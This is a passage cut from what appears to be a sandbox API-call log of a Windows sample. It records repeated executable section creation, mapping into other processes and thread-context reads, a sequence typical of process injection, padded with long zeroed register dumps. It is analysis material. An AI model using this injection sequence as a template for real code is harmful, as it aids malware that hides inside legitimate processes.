AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x114000) returned 0x0 [0174.600] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x113200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0xa60000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x114000) returned 0x0 [0179.622] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x3df928, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x3df8d0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x3df8b4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0179.623] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0179.623] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0xfa200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0xfb000) returned 0x0 [0179.629] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0xfa200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x28e0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0xfb000) returned 0x0 [0184.714] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x17fe18, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x17fdc0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x17fda4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0184.716] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0184.716] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x16a200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x16b000) returned 0x0 [0184.716] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x16a200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x9e0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x16b000) returned 0x0 [0189.905] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x36fb80, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x36fb28, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x36fb0c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, 